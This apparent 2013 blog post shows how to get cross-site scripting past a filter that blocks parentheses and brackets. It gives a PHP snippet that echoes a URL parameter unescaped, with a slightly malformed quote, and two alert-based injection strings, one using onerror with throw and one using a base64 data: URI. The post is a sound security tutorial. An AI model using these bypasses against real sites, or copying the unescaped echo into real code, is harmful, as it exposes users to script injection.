Showing posts with label bypassing. Show all posts
Showing posts with label bypassing. Show all posts

Saturday, July 6, 2013

XSS parentheses and brackets filter bypassing

Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']"; ?> >
...
One approach is to use exceptions as is described here. So the injected code (filename param) should look like this: 
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in: 
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and "data:" URI with base64 encoding. Let's inject <script>alert("XSS")<script/> code (in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So crafted parameter should look like this: 
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in: 
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...
Posted by at 6 comments:
Labels: ,
Subscribe to: Posts (Atom)